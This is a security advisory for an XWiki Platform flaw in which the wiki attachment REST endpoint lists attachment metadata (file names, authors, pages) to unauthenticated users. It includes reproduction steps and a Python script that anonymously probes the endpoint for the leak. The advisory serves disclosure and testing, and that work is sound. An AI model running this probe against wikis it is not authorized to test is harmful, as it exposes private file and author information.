XWiki Attachment Metadata Access Vulnerability via Unauthenticated REST API

Vulnerability

XWiki Platform versions from 1.8.1 before 14.10.22, from 15.0-rc-1 before 15.10.12, from 16.0.0-rc-1 before 16.4.3, and from 16.5.0-rc-1 before 16.7.0 expose the metadata of every attachment in the wiki to unauthenticated users through the wiki attachment REST endpoint. The endpoint performs no access check against the requesting user's rights, so the metadata is returned regardless of who asks, including on private wikis where the guest user has no view right at all.

Impact

Anyone who can reach the REST API, without an account, obtains the metadata of all attachments in the wiki: file names, authors and the other attributes the attachment listing carries. On a private wiki that information is sensitive in its own right, since file names and author names reveal what the wiki holds and who is working on it even when the pages and the attachment contents themselves remain inaccessible.

Reproduction

To reproduce: as an administrator, remove the 'view' right from the 'guest' user on the whole wiki, then log out so the browser holds no session. Then request the wiki attachment REST endpoint (the wiki-level listing, or the equivalent listing for a space or page). On a wiki that guests cannot view the expected response is an empty attachment list; on an affected version the response instead lists the attachments with their metadata, even though the requester has no right to view anything.
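The check below is an added example, not code from the advisory or from the XWiki project. It issues an anonymous request (no cookies, no Authorization header) against the wiki-level attachment endpoint and reports whether any attachment metadata comes back. It assumes the REST root sits under <base>/rest as in a default XWiki install and that the server honours 'Accept: application/json'; the endpoint path, the field names and both sample responses are assumptions or constructed data, and the result is only meaningful on a wiki where guest has no 'view' right, where any returned entry is a leak.

```python
"""Check whether the wiki attachment REST endpoint returns attachment
metadata to an unauthenticated client.

Assumptions (not from the advisory): REST root at <base>/rest, wiki-level
endpoint /rest/wikis/{wiki}/attachments, JSON representation on request.
The two SAMPLE_* responses are constructed for an offline demonstration.
"""
import json
import urllib.error
import urllib.request

# Constructed sample of what an affected instance returns to an anonymous
# request (field names follow the XWiki REST attachment representation;
# the values are invented).
SAMPLE_LEAK = json.dumps({
    "links": [],
    "attachments": [
        {"id": "xwiki:Finance.Q3Report@forecast.xlsx", "name": "forecast.xlsx",
         "size": 48213, "pageId": "xwiki:Finance.Q3Report",
         "author": "XWiki.jdoe", "date": "2024-08-30T10:12:00+02:00",
         "mimeType": "application/vnd.ms-excel"},
        {"id": "xwiki:HR.Salaries@bands.pdf", "name": "bands.pdf",
         "size": 10240, "pageId": "xwiki:HR.Salaries",
         "author": "XWiki.asmith", "date": "2024-07-02T09:00:00+02:00",
         "mimeType": "application/pdf"},
    ],
})

# Constructed sample of the expected response on a private wiki once the
# endpoint enforces view rights: no attachments at all.
SAMPLE_EMPTY = json.dumps({"links": [], "attachments": []})


def attachment_endpoint(base_url: str, wiki: str = "xwiki") -> str:
    """Wiki-level attachment listing, e.g.
    https://host/xwiki/rest/wikis/xwiki/attachments (assumed layout)."""
    return f"{base_url.rstrip('/')}/rest/wikis/{wiki}/attachments"


def extract_attachment_metadata(body: str) -> list[dict]:
    """Pull the fields that matter for disclosure out of a JSON response."""
    data = json.loads(body)
    return [
        {
            "name": a.get("name"),
            "page": a.get("pageId"),
            "author": a.get("author"),
            "size": a.get("size"),
            "date": a.get("date"),
        }
        for a in data.get("attachments", [])
    ]


def assess(body: str, status: int = 200) -> dict:
    """Classify one response. A non-200 status means the endpoint refused
    the anonymous request, which is what a private wiki should do."""
    if status != 200:
        return {"leaked": False, "count": 0, "attachments": [], "status": status}
    meta = extract_attachment_metadata(body)
    return {"leaked": bool(meta), "count": len(meta), "attachments": meta,
            "status": status}


def probe(base_url: str, wiki: str = "xwiki", timeout: float = 10.0) -> dict:
    """Live check: anonymous GET, JSON representation, no credentials sent."""
    req = urllib.request.Request(
        attachment_endpoint(base_url, wiki),
        headers={"Accept": "application/json"},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return assess(resp.read().decode("utf-8"), resp.status)
    except urllib.error.HTTPError as err:
        return assess("", err.code)


if __name__ == "__main__":
    import sys

    if len(sys.argv) > 1:
        result = probe(sys.argv[1])      # e.g. https://wiki.example.org/xwiki
    else:
        result = assess(SAMPLE_LEAK)     # offline run on the constructed sample
    print(json.dumps(result, indent=2))
```

Run it with the wiki's base URL after revoking guest view as described above; a 'leaked' result with a non-zero count reproduces the issue, while an empty list or a 401/403 indicates the endpoint is enforcing rights. The same parsing applies to the space- and page-level attachment listings if those are the endpoints being checked.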

Remediation

Upgrade to XWiki 14.10.22, 15.10.12, 16.4.3 or 16.7.0, whichever matches the branch in use. Installations that cannot upgrade immediately and run 15.10.11 from the XWiki Debian package (the version the named JAR belongs to) can apply the fix by replacing the 'xwiki-platform-rest-server-15.10.11.jar' file with the latest SNAPSHOT build of that module from the 'XWiki Nexus Snapshots' repository. A SNAPSHOT is a pre-release build, so treat this as a stopgap until the fixed release is installed.

Added: Jun 9, 2025, 7:46 PM
Updated: Jun 9, 2025, 7:46 PM

Vulnerability Rating

Custom Algorithm

spread: 3.1
impact: 0.6
exploitability: 9.5
remediation: 7.7
relevance: 0.0
threat: 6.4
urgency: 2.9
incentive: 10.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.